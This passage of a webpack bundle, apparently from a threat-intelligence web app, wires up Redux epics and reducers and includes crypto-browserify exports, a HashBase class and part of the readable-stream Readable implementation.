var rootEpic = Object(__WEBPACK_IMPORTED_MODULE_1_trustar_utils_redux_utils__["b" /* createRootEpic */])([{ epic: __WEBPACK_IMPORTED_MODULE_29_modules_entity_scores__["c" /* epic */], name: 'entityScoresEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_37_modules_global_whitelist__["epic"], name: 'globalWhitelistEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_38_modules_company_whitelist__["epic"], name: 'companyWhitelistEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_6_modules_alerts__["epic"], name: 'alertEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_5_modules_app__["epic"], name: 'appEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_7_modules_chat__["b" /* epic */], name: 'chatEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_8_modules_companies__["epic"], name: 'companiesEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_45_modules_constellation__["b" /* epic */], name: 'constellationEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_44_modules_analysis__["epic"], name: 'analysisEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_9_modules_create__["epic"], name: 'createEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_10_modules_data_feeds__["epic"], name: 'dataFeedsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_30_modules_errors__["c" /* epic */], name: 'errorsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_11_modules_devtasks__["epic"], name: 'devtasksEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_12_modules_enclave__["epic"], name: 'enclavesEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_13_modules_enclave_management__["epic"], name: 'enclaveManagementEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_14_modules_icons__["epic"], name: 'iconsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_15_modules_miscellaneous__["epic"], name: 'miscellaneousEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_16_modules_templates__["epic"], name: 'templatesEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_18_modules_subscriptions__["epic"], name: 'subscriptionsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_17_modules_subscription_management__["epic"], name: 'subscriptionManagementEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_19_modules_groups__["epic"], name: 'groupsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_21_modules_marketplace__["epic"], name: 'marketplaceEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_20__insights__["epic"], name: 'insightsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_22_modules_malware__["epic"], name: 'malwareEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_23_modules_threat_actors__["epic"], name: 'threatActorsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_24_modules_metrics__["epic"], name: 'metricsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_25_modules_profile__["epic"], name: 'profileEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_26_modules_redaction__["epic"], name: 'redactionEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_27_modules_reports__["epic"], name: 'reportsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_32_modules_roles__["epic"], name: 'rolesEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_39_modules_search__["epic"], name: 'searchEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_33_modules_sectors__["epic"], name: 'sectorsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_35_modules_users__["epic"], name: 'usersEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_34_modules_settings__["epic"], name: 'settingsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_40_modules_tags__["epic"], name: 'tagsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_43_modules_router_epics_js__["a" /* default */], name: 'navigationEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_36_modules_indicators__["epic"], name: 'indicatorsEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_46_modules_tracking__["a" /* epic */], name: 'trackingEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_42_modules_notificationPreferences__["c" /* epic */], name: 'notificationPreferencesEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_47_modules_features__["b" /* epic */], name: 'featuresEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_28_modules_summaries__["c" /* epic */], name: 'summariesEpic' }, { epic: __WEBPACK_IMPORTED_MODULE_41_modules_triage__["c" /* epic */], name: 'triageEpic' }]);

/* Stores:
 ================================================================================= */
var rootReducer = Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  entityScores: __WEBPACK_IMPORTED_MODULE_29_modules_entity_scores__["b" /* default */],
  globalWhitelist: __WEBPACK_IMPORTED_MODULE_37_modules_global_whitelist__["default"],
  companyWhitelist: __WEBPACK_IMPORTED_MODULE_38_modules_company_whitelist__["default"],
  form: __WEBPACK_IMPORTED_MODULE_2_redux_form_immutable__["reducer"],
  router: __WEBPACK_IMPORTED_MODULE_3_react_router_redux__["routerReducer"],
  app: __WEBPACK_IMPORTED_MODULE_5_modules_app__["default"],
  alerts: __WEBPACK_IMPORTED_MODULE_6_modules_alerts__["default"],
  chat: __WEBPACK_IMPORTED_MODULE_7_modules_chat__["a" /* default */],
  companies: __WEBPACK_IMPORTED_MODULE_8_modules_companies__["default"],
  create: __WEBPACK_IMPORTED_MODULE_9_modules_create__["default"],
  dataFeeds: __WEBPACK_IMPORTED_MODULE_10_modules_data_feeds__["default"],
  devtasks: __WEBPACK_IMPORTED_MODULE_11_modules_devtasks__["default"],
  enclaves: __WEBPACK_IMPORTED_MODULE_12_modules_enclave__["default"],
  enclaveManagement: __WEBPACK_IMPORTED_MODULE_13_modules_enclave_management__["default"],
  miscellaneous: __WEBPACK_IMPORTED_MODULE_15_modules_miscellaneous__["default"],
  templates: __WEBPACK_IMPORTED_MODULE_16_modules_templates__["default"],
  subscriptions: __WEBPACK_IMPORTED_MODULE_18_modules_subscriptions__["default"],
  subscriptionManagement: __WEBPACK_IMPORTED_MODULE_17_modules_subscription_management__["default"],
  groups: __WEBPACK_IMPORTED_MODULE_19_modules_groups__["default"],
  insights: __WEBPACK_IMPORTED_MODULE_20__insights__["default"],
  marketplace: __WEBPACK_IMPORTED_MODULE_21_modules_marketplace__["default"],
  malware: __WEBPACK_IMPORTED_MODULE_22_modules_malware__["default"],
  threatActors: __WEBPACK_IMPORTED_MODULE_23_modules_threat_actors__["default"],
  metrics: __WEBPACK_IMPORTED_MODULE_24_modules_metrics__["default"],
  profile: __WEBPACK_IMPORTED_MODULE_25_modules_profile__["default"],
  redaction: __WEBPACK_IMPORTED_MODULE_26_modules_redaction__["default"],
  reports: __WEBPACK_IMPORTED_MODULE_27_modules_reports__["default"],
  display: __WEBPACK_IMPORTED_MODULE_31_modules_display__["default"],
  roles: __WEBPACK_IMPORTED_MODULE_32_modules_roles__["default"],
  sectors: __WEBPACK_IMPORTED_MODULE_33_modules_sectors__["default"],
  users: __WEBPACK_IMPORTED_MODULE_35_modules_users__["default"],
  features: __WEBPACK_IMPORTED_MODULE_47_modules_features__["a" /* default */],
  errors: __WEBPACK_IMPORTED_MODULE_30_modules_errors__["b" /* default */],
  // analytics,
  search: __WEBPACK_IMPORTED_MODULE_39_modules_search__["default"],
  settings: __WEBPACK_IMPORTED_MODULE_34_modules_settings__["default"],
  tags: __WEBPACK_IMPORTED_MODULE_40_modules_tags__["default"],
  indicators: __WEBPACK_IMPORTED_MODULE_36_modules_indicators__["default"],
  summaries: __WEBPACK_IMPORTED_MODULE_28_modules_summaries__["b" /* default */],
  notificationPreferences: __WEBPACK_IMPORTED_MODULE_42_modules_notificationPreferences__["b" /* default */],
  analyses: __WEBPACK_IMPORTED_MODULE_44_modules_analysis__["stores"].analyses,
  analysesMeta: __WEBPACK_IMPORTED_MODULE_44_modules_analysis__["stores"].analysesMeta,
  constellation: __WEBPACK_IMPORTED_MODULE_45_modules_constellation__["d" /* stores */].constellation,
  constellationMeta: __WEBPACK_IMPORTED_MODULE_45_modules_constellation__["d" /* stores */].constellationMeta,
  triage: __WEBPACK_IMPORTED_MODULE_41_modules_triage__["b" /* default */]
});

/* Serializers:
 * Used to serialize state to plain JS so that it can be stored in local
 * storage. NOTE: There is no need to call JSON.stringify, that will be handled
 * by redux-persist
 ================================================================================= */


var combineSerializers = function combineSerializers(serializers) {
  var combined = function combined(state, key) {
    var serializer = serializers[key];

    if (typeof serializer !== 'function') {
      console.warn('WARNING: Tried to serialize state for key "' + key + '" but you did not provide a serializer.');
      return state;
    }

    return serializers[key](state);
  };

  // NOTE: This might seem odd, it is. I'm storing the keys here so that when we
  // create the store whitelist in redux-persist we don't need to duplicate the
  // store keys. This way whenever we update our rootSerializer below with new
  // stores they will be included in redux persist.
  combined.keys = Object.keys(serializers);

  return combined;
};






var rootSerializer = combineSerializers({
  app: __WEBPACK_IMPORTED_MODULE_48_modules_app_stores_js__["b" /* serialize */],
  enclaves: __WEBPACK_IMPORTED_MODULE_49_modules_enclave_stores_js__["b" /* serialize */],
  profile: __WEBPACK_IMPORTED_MODULE_50_modules_profile_stores_js__["b" /* serialize */],
  settings: __WEBPACK_IMPORTED_MODULE_51_modules_settings_stores_js__["b" /* serialize */]
});

/***/ }),
/* 997 */,
/* 998 */,
/* 999 */,
/* 1000 */,
/* 1001 */,
/* 1002 */,
/* 1003 */,
/* 1004 */,
/* 1005 */,
/* 1006 */,
/* 1007 */,
/* 1008 */,
/* 1009 */,
/* 1010 */,
/* 1011 */,
/* 1012 */,
/* 1013 */,
/* 1014 */,
/* 1015 */,
/* 1016 */,
/* 1017 */,
/* 1018 */,
/* 1019 */,
/* 1020 */,
/* 1021 */,
/* 1022 */,
/* 1023 */,
/* 1024 */,
/* 1025 */,
/* 1026 */,
/* 1027 */,
/* 1028 */,
/* 1029 */,
/* 1030 */,
/* 1031 */,
/* 1032 */,
/* 1033 */,
/* 1034 */,
/* 1035 */,
/* 1036 */,
/* 1037 */,
/* 1038 */,
/* 1039 */,
/* 1040 */,
/* 1041 */,
/* 1042 */,
/* 1043 */,
/* 1044 */,
/* 1045 */,
/* 1046 */,
/* 1047 */,
/* 1048 */,
/* 1049 */,
/* 1050 */,
/* 1051 */,
/* 1052 */,
/* 1053 */,
/* 1054 */,
/* 1055 */,
/* 1056 */,
/* 1057 */,
/* 1058 */,
/* 1059 */,
/* 1060 */,
/* 1061 */,
/* 1062 */,
/* 1063 */,
/* 1064 */,
/* 1065 */,
/* 1066 */,
/* 1067 */,
/* 1068 */,
/* 1069 */,
/* 1070 */,
/* 1071 */,
/* 1072 */,
/* 1073 */,
/* 1074 */,
/* 1075 */,
/* 1076 */,
/* 1077 */,
/* 1078 */,
/* 1079 */,
/* 1080 */,
/* 1081 */,
/* 1082 */,
/* 1083 */,
/* 1084 */,
/* 1085 */,
/* 1086 */,
/* 1087 */,
/* 1088 */,
/* 1089 */,
/* 1090 */,
/* 1091 */,
/* 1092 */,
/* 1093 */,
/* 1094 */,
/* 1095 */,
/* 1096 */,
/* 1097 */,
/* 1098 */,
/* 1099 */,
/* 1100 */,
/* 1101 */,
/* 1102 */,
/* 1103 */,
/* 1104 */,
/* 1105 */,
/* 1106 */,
/* 1107 */,
/* 1108 */,
/* 1109 */,
/* 1110 */,
/* 1111 */,
/* 1112 */,
/* 1113 */,
/* 1114 */,
/* 1115 */,
/* 1116 */,
/* 1117 */,
/* 1118 */,
/* 1119 */,
/* 1120 */,
/* 1121 */,
/* 1122 */,
/* 1123 */,
/* 1124 */,
/* 1125 */,
/* 1126 */,
/* 1127 */,
/* 1128 */,
/* 1129 */,
/* 1130 */,
/* 1131 */,
/* 1132 */,
/* 1133 */,
/* 1134 */,
/* 1135 */,
/* 1136 */,
/* 1137 */,
/* 1138 */,
/* 1139 */,
/* 1140 */,
/* 1141 */,
/* 1142 */,
/* 1143 */,
/* 1144 */,
/* 1145 */,
/* 1146 */,
/* 1147 */,
/* 1148 */,
/* 1149 */,
/* 1150 */,
/* 1151 */,
/* 1152 */,
/* 1153 */,
/* 1154 */,
/* 1155 */,
/* 1156 */,
/* 1157 */,
/* 1158 */,
/* 1159 */,
/* 1160 */,
/* 1161 */,
/* 1162 */,
/* 1163 */,
/* 1164 */,
/* 1165 */,
/* 1166 */,
/* 1167 */,
/* 1168 */,
/* 1169 */,
/* 1170 */,
/* 1171 */,
/* 1172 */,
/* 1173 */,
/* 1174 */,
/* 1175 */,
/* 1176 */,
/* 1177 */,
/* 1178 */,
/* 1179 */,
/* 1180 */,
/* 1181 */,
/* 1182 */,
/* 1183 */,
/* 1184 */,
/* 1185 */,
/* 1186 */,
/* 1187 */,
/* 1188 */,
/* 1189 */,
/* 1190 */,
/* 1191 */,
/* 1192 */,
/* 1193 */,
/* 1194 */,
/* 1195 */,
/* 1196 */,
/* 1197 */,
/* 1198 */,
/* 1199 */,
/* 1200 */,
/* 1201 */,
/* 1202 */,
/* 1203 */,
/* 1204 */,
/* 1205 */,
/* 1206 */,
/* 1207 */,
/* 1208 */,
/* 1209 */,
/* 1210 */,
/* 1211 */,
/* 1212 */,
/* 1213 */,
/* 1214 */,
/* 1215 */,
/* 1216 */,
/* 1217 */,
/* 1218 */,
/* 1219 */,
/* 1220 */,
/* 1221 */,
/* 1222 */,
/* 1223 */,
/* 1224 */,
/* 1225 */,
/* 1226 */,
/* 1227 */,
/* 1228 */,
/* 1229 */,
/* 1230 */,
/* 1231 */,
/* 1232 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


exports.randomBytes = exports.rng = exports.pseudoRandomBytes = exports.prng = __webpack_require__(274)
exports.createHash = exports.Hash = __webpack_require__(346)
exports.createHmac = exports.Hmac = __webpack_require__(1241)

var algos = __webpack_require__(2678)
var algoKeys = Object.keys(algos)
var hashes = ['sha1', 'sha224', 'sha256', 'sha384', 'sha512', 'md5', 'rmd160'].concat(algoKeys)
exports.getHashes = function () {
  return hashes
}

var p = __webpack_require__(1244)
exports.pbkdf2 = p.pbkdf2
exports.pbkdf2Sync = p.pbkdf2Sync

var aes = __webpack_require__(2680)

exports.Cipher = aes.Cipher
exports.createCipher = aes.createCipher
exports.Cipheriv = aes.Cipheriv
exports.createCipheriv = aes.createCipheriv
exports.Decipher = aes.Decipher
exports.createDecipher = aes.createDecipher
exports.Decipheriv = aes.Decipheriv
exports.createDecipheriv = aes.createDecipheriv
exports.getCiphers = aes.getCiphers
exports.listCiphers = aes.listCiphers

var dh = __webpack_require__(2698)

exports.DiffieHellmanGroup = dh.DiffieHellmanGroup
exports.createDiffieHellmanGroup = dh.createDiffieHellmanGroup
exports.getDiffieHellman = dh.getDiffieHellman
exports.createDiffieHellman = dh.createDiffieHellman
exports.DiffieHellman = dh.DiffieHellman

var sign = __webpack_require__(2703)

exports.createSign = sign.createSign
exports.Sign = sign.Sign
exports.createVerify = sign.createVerify
exports.Verify = sign.Verify

exports.createECDH = __webpack_require__(2741)

var publicEncrypt = __webpack_require__(2742)

exports.publicEncrypt = publicEncrypt.publicEncrypt
exports.privateEncrypt = publicEncrypt.privateEncrypt
exports.publicDecrypt = publicEncrypt.publicDecrypt
exports.privateDecrypt = publicEncrypt.privateDecrypt

// the least I can do is make error messages for the rest of the node.js/crypto api.
// ;[
//   'createCredentials'
// ].forEach(function (name) {
//   exports[name] = function () {
//     throw new Error([
//       'sorry, ' + name + ' is not implemented yet',
//       'we accept pull requests',
//       'https://github.com/crypto-browserify/crypto-browserify'
//     ].join('\n'))
//   }
// })

var rf = __webpack_require__(2745)

exports.randomFill = rf.randomFill
exports.randomFillSync = rf.randomFillSync

exports.createCredentials = function () {
  throw new Error([
    'sorry, createCredentials is not implemented yet',
    'we accept pull requests',
    'https://github.com/crypto-browserify/crypto-browserify'
  ].join('\n'))
}

exports.constants = {
  'DH_CHECK_P_NOT_SAFE_PRIME': 2,
  'DH_CHECK_P_NOT_PRIME': 1,
  'DH_UNABLE_TO_CHECK_GENERATOR': 4,
  'DH_NOT_SUITABLE_GENERATOR': 8,
  'NPN_ENABLED': 1,
  'ALPN_ENABLED': 1,
  'RSA_PKCS1_PADDING': 1,
  'RSA_SSLV23_PADDING': 2,
  'RSA_NO_PADDING': 3,
  'RSA_PKCS1_OAEP_PADDING': 4,
  'RSA_X931_PADDING': 5,
  'RSA_PKCS1_PSS_PADDING': 6,
  'POINT_CONVERSION_COMPRESSED': 2,
  'POINT_CONVERSION_UNCOMPRESSED': 4,
  'POINT_CONVERSION_HYBRID': 6
}


/***/ }),
/* 1233 */,
/* 1234 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";

var Buffer = __webpack_require__(41).Buffer
var Transform = __webpack_require__(685).Transform
var inherits = __webpack_require__(25)

function throwIfNotStringOrBuffer (val, prefix) {
  if (!Buffer.isBuffer(val) && typeof val !== 'string') {
    throw new TypeError(prefix + ' must be a string or a buffer')
  }
}

function HashBase (blockSize) {
  Transform.call(this)

  this._block = Buffer.allocUnsafe(blockSize)
  this._blockSize = blockSize
  this._blockOffset = 0
  this._length = [0, 0, 0, 0]

  this._finalized = false
}

inherits(HashBase, Transform)

HashBase.prototype._transform = function (chunk, encoding, callback) {
  var error = null
  try {
    this.update(chunk, encoding)
  } catch (err) {
    error = err
  }

  callback(error)
}

HashBase.prototype._flush = function (callback) {
  var error = null
  try {
    this.push(this.digest())
  } catch (err) {
    error = err
  }

  callback(error)
}

HashBase.prototype.update = function (data, encoding) {
  throwIfNotStringOrBuffer(data, 'Data')
  if (this._finalized) throw new Error('Digest already called')
  if (!Buffer.isBuffer(data)) data = Buffer.from(data, encoding)

  // consume data
  var block = this._block
  var offset = 0
  while (this._blockOffset + data.length - offset >= this._blockSize) {
    for (var i = this._blockOffset; i < this._blockSize;) block[i++] = data[offset++]
    this._update()
    this._blockOffset = 0
  }
  while (offset < data.length) block[this._blockOffset++] = data[offset++]

  // update length
  for (var j = 0, carry = data.length * 8; carry > 0; ++j) {
    this._length[j] += carry
    carry = (this._length[j] / 0x0100000000) | 0
    if (carry > 0) this._length[j] -= 0x0100000000 * carry
  }

  return this
}

HashBase.prototype._update = function () {
  throw new Error('_update is not implemented')
}

HashBase.prototype.digest = function (encoding) {
  if (this._finalized) throw new Error('Digest already called')
  this._finalized = true

  var digest = this._digest()
  if (encoding !== undefined) digest = digest.toString(encoding)

  // reset state
  this._block.fill(0)
  this._blockOffset = 0
  for (var i = 0; i < 4; ++i) this._length[i] = 0

  return digest
}

HashBase.prototype._digest = function () {
  throw new Error('_digest is not implemented')
}

module.exports = HashBase


/***/ }),
/* 1235 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(global, process) {// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.



/*<replacement>*/

var pna = __webpack_require__(486);
/*</replacement>*/

module.exports = Readable;

/*<replacement>*/
var isArray = __webpack_require__(1233);
/*</replacement>*/

/*<replacement>*/
var Duplex;
/*</replacement>*/

Readable.ReadableState = ReadableState;

/*<replacement>*/
var EE = __webpack_require__(275).EventEmitter;

var EElistenerCount = function (emitter, type) {
  return emitter.listeners(type).length;
};
/*</replacement>*/

/*<replacement>*/
var Stream = __webpack_require__(1236);
/*</replacement>*/

/*<replacement>*/

var Buffer = __webpack_require__(687).Buffer;
var OurUint8Array = global.Uint8Array || function () {};
function _uint8ArrayToBuffer(chunk) {
  return Buffer.from(chunk);
}
function _isUint8Array(obj) {
  return Buffer.isBuffer(obj) || obj instanceof OurUint8Array;
}

/*</replacement>*/

/*<replacement>*/
var util = __webpack_require__(347);
util.inherits = __webpack_require__(348);
/*</replacement>*/

/*<replacement>*/
var debugUtil = __webpack_require__(2663);
var debug = void 0;
if (debugUtil && debugUtil.debuglog) {
  debug = debugUtil.debuglog('stream');
} else {
  debug = function () {};
}
/*</replacement>*/

var BufferList = __webpack_require__(2664);
var destroyImpl = __webpack_require__(1237);
var StringDecoder;

util.inherits(Readable, Stream);

var kProxyEvents = ['error', 'close', 'destroy', 'pause', 'resume'];

function prependListener(emitter, event, fn) {
  // Sadly this is not cacheable as some libraries bundle their own
  // event emitter implementation with them.
  if (typeof emitter.prependListener === 'function') return emitter.prependListener(event, fn);

  // This is a hack to make sure that our error handler is attached before any
  // userland ones.  NEVER DO THIS. This is here only because this code needs
  // to continue to work with older versions of Node.js that do not include
  // the prependListener() method. The goal is to eventually remove this hack.
  if (!emitter._events || !emitter._events[event]) emitter.on(event, fn);else if (isArray(emitter._events[event])) emitter._events[event].unshift(fn);else emitter._events[event] = [fn, emitter._events[event]];
}

function ReadableState(options, stream) {
  Duplex = Duplex || __webpack_require__(237);

  options = options || {};

  // Duplex streams are both readable and writable, but share
  // the same options object.
  // However, some cases require setting options to different
  // values for the readable and the writable sides of the duplex stream.
  // These options can be provided separately as readableXXX and writableXXX.
  var isDuplex = stream instanceof Duplex;

  // object stream flag. Used to make read(n) ignore n and to
  // make all the buffer merging and length checks go away
  this.objectMode = !!options.objectMode;

  if (isDuplex) this.objectMode = this.objectMode || !!options.readableObjectMode;

  // the point at which it stops calling _read() to fill the buffer
  // Note: 0 is a valid value, means "don't call _read preemptively ever"
  var hwm = options.highWaterMark;
  var readableHwm = options.readableHighWaterMark;
  var defaultHwm = this.objectMode ? 16 : 16 * 1024;

  if (hwm || hwm === 0) this.highWaterMark = hwm;else if (isDuplex && (readableHwm || readableHwm === 0)) this.highWaterMark = readableHwm;else this.highWaterMark = defaultHwm;

  // cast to ints.
  this.highWaterMark = Math.floor(this.highWaterMark);

  // A linked list is used to store data chunks instead of an array because the
  // linked list can remove elements from the beginning faster than
  // array.shift()
  this.buffer = new BufferList();
  this.length = 0;
  this.pipes = null;
  this.pipesCount = 0;
  this.flowing = null;
  this.ended = false;
  this.endEmitted = false;
  this.reading = false;

  // a flag to be able to tell if the event 'readable'/'data' is emitted
  // immediately, or on a later tick.  We set this to true at first, because
  // any actions that shouldn't happen until "later" should generally also
  // not happen before the first read call.
  this.sync = true;

  // whenever we return null, then we set a flag to say
  // that we're awaiting a 'readable' event emission.
  this.needReadable = false;
  this.emittedReadable = false;
  this.readableListening = false;
  this.resumeScheduled = false;

  // has it been destroyed
  this.destroyed = false;

  // Crypto is kind of old and crusty.  Historically, its default string
  // encoding is 'binary' so we have to make this configurable.
  // Everything else in the universe uses 'utf8', though.
  this.defaultEncoding = options.defaultEncoding || 'utf8';

  // the number of writers that are awaiting a drain event in .pipe()s
  this.awaitDrain = 0;

  // if true, a maybeReadMore has been scheduled
  this.readingMore = false;

  this.decoder = null;
  this.encoding = null;
  if (options.encoding) {
    if (!StringDecoder) StringDecoder = __webpack_require__(487).StringDecoder;
    this.decoder = new StringDecoder(options.encoding);
    this.encoding = options.encoding;
  }
}

function Readable(options) {
  Duplex = Duplex || __webpack_require__(237);

  if (!(this instanceof Readable)) return new Readable(options);

  this._readableState = new ReadableState(options, this);

  // legacy
  this.readable = true;

  if (options) {
    if (typeof options.read === 'function') this._read = options.read;

    if (typeof options.destroy === 'function') this._destroy = options.destroy;
  }

  Stream.call(this);
}

Object.defineProperty(Readable.prototype, 'destroyed', {
  get: function () {
    if (this._readableState === undefined) {
      return false;
    }
    return this._readableState.destroyed;
  },
  set: function (value) {
    // we ignore the value if the stream
    // has not been initialized yet
    if (!this._readableState) {
      return;
    }

    // backward compatibility, the user is explicitly
    // managing destroyed
    this._readableState.destroyed = value;
  }
});

Readable.prototype.destroy = destroyImpl.destroy;
Readable.prototype._undestroy = destroyImpl.undestroy;
Readable.prototype._destroy = function (err, cb) {
  this.push(null);
  cb(err);
};

// Manually shove something into the read() buffer.
// This returns true if the highWaterMark has not been hit yet,
// similar to how Writable.write() returns true if you should
// write() some more.
Readable.prototype.push = function (chunk, encoding) {
  var state = this._readableState;
  var skipChunkCheck;

  if (!state.objectMode) {
    if (typeof chunk === 'string') {
      encoding = encoding || state.defaultEncoding;
      if (encoding !== state.encoding) {
        chunk = Buffer.from(chunk, encoding);
        encoding = '';
      }
      skipChunkCheck = true;
    }
  } else {
    skipChunkCheck = true;
  }

  return readableAddChunk(this, chunk, encoding, false, skipChunkCheck);
};

// Unshift should *always* be something directly out of read()
Readable.prototype.unshift = function (chunk) {
  return readableAddChunk(this, chunk, null, true, false);
};

function readableAddChunk(stream, chunk, encoding, addToFront, skipChunkCheck) {
  var state = stream._readableState;
  if (chunk === null) {
    state.reading = false;
    onEofChunk(stream, state);
  } else {
    var er;
    if (!skipChunkCheck) er = chunkInvalid(state, chunk);
    if (er) {
      stream.emit('error', er);
    } else if (state.objectMode || chunk && chunk.length > 0) {
      if (typeof chunk !== 'string' && !state.objectMode && Object.getPrototypeOf(chunk) !== Buffer.prototype) {
        chunk = _uint8ArrayToBuffer(chunk);
      }

      if (addToFront) {
        if (state.endEmitted) stream.emit('error', new Error('stream.unshift() after end event'));else addChunk(stream, state, chunk, true);
      } else if (state.ended) {
        stream.emit('error', new Error('stream.push() after EOF'));
      } else {
        state.reading = false;
        if (state.decoder && !encoding) {
          chunk = state.decoder.write(chunk);
          if (state.objectMode || chunk.length !== 0) addChunk(stream, state, chunk, false);else maybeReadMore(stream, state);
        } else {
          addChunk(stream, state, chunk, false);
        }
      }
    } else if (!addToFront) {
      state.reading = false;
    }
  }

  return needMoreData(state);
}

function addChunk(stream, state, chunk, addToFront) {
  if (state.flowing && state.length === 0 && !state.sync) {
    stream.emit('data', chunk);
    stream.read(0);
  } else {
    // update the buffer info.
    state.length += state.objectMode ? 1 : chunk.length;
    if (addToFront) state.buffer.unshift(chunk);else state.buffer.push(chunk);

    if (state.needReadable) emitReadable(stream);
  }
  maybeReadMore(stream, state);
}

function chunkInvalid(state, chunk) {
  var er;
  if (!_isUint8Array(chunk) && typeof chunk !== 'string' && chunk !== undefined && !state.objectMode) {
    er = new TypeError('Invalid non-string/buffer chunk');
  }
  return er;
}

// if it's past the high water mark, we can push in some more.
// Also, if we have no data yet, we can stand some
// more bytes.  This is to work around cases where hwm=0,
// such as the repl.  Also, if the push() triggered a
// readable event, and the user called read(largeNumber) such that
// needReadable was set, then we ought to push more, so that another
// 'readable' event will be triggered.
function needMoreData(state) {
  return !state.ended && (state.needReadable || state.length < state.highWaterMark || state.length === 0);
}

Readable.prototype.isPaused = function () {
  return this._readableState.flowing === false;
};

// backwards compatibility.
Readable.prototype.setEncoding = function (enc) {
  if (!StringDecoder) StringDecoder = __webpack_require__(487).StringDecoder;
  this._readableState.decoder = new StringDecoder(enc);
  this._readableState.encoding = enc;
  return this;
};

// Don't raise the hwm > 8MB
var MAX_HWM = 0x800000;
function computeNewHighWaterMark(n) {
  if (n >= MAX_HWM) {
    n = MAX_HWM;
  } else {
    // Get the next highest power of 2 to prevent increasing hwm excessively in
    // tiny amounts
    n--;
    n |= n >>> 1;
    n |= n >>> 2;
    n |= n >>> 4;
    n |= n >>> 8;
    n |= n >>> 16;
    n++;
  }
  return n;
}

// This function is designed to be inlinable, so please take care when making
// changes to the function body.
function howMuchToRead(n, state) {
  if (n <= 0 || state.length === 0 && state.ended) return 0;
  if (state.objectMode) return 1;
  if (n !== n) {
    // Only flow one buffer at a time
    if (state.flowing && state.length) return state.buffer.head.data.length;else return state.length;
  }
  // If we're asking for more than the current hwm, then raise the hwm.
  if (n > state.highWaterMark) state.highWaterMark = computeNewHighWaterMark(n);
  if (n <= state.length) return n;
  // Don't have enough
  if (!state.ended) {
    state.needReadable = true;
    return 0;
  }
  return state.length;
}

// you can override either this method, or the async _read(n) below.
Readable.prototype.read = function (n) {
  debug('read', n);
  n = parseInt(n, 10);
  var state = this._readableState;
  var nOrig = n;

  if (n !== 0) state.emittedReadable = false;

  // if we're doing read(0) to trigger a readable event, but we
  // already have a bunch of data in the buffer, then just trigger
  // the 'readable' event and move on.
  if (n === 0 && state.needReadable && (state.length >= state.highWaterMark || state.ended)) {
    debug('read: emitReadable', state.length, state.ended);
    if (state.length === 0 && state.ended) endReadable(this);else emitReadable(this);
    return null;
  }

  n = howMuchToRead(n, state);

  // if we've ended, and we're now clear, then finish it up.
  if (n === 0 && state.ended) {
    if (state.length === 0) endReadable(this);
    return null;
  }

  // All the actual chunk generation logic needs to be
  // *below* the call to _read.  The reason is that in certain
  // synthetic stream cases, such as passthrough streams, _read
  // may be a completely synchronous operation which may change
  // the state of the read buffer, providing enough data when
  // before there was *not* enough.
  //
  // So, the steps are:
  // 1. Figure out what the state of things will be after we do
  // a read from the buffer.
  //
  // 2. If that resulting state will trigger a _read, then call _read.
  // Note that this may be asynchronous, or synchronous.  Yes, it is
  // deeply ugly to write APIs this way, but that still doesn't mean
  // that the Readable class should behave improperly, as streams are
  // designed to be sync/async agnostic.
  // Take note if the _read call is sync or async (ie, if the read call
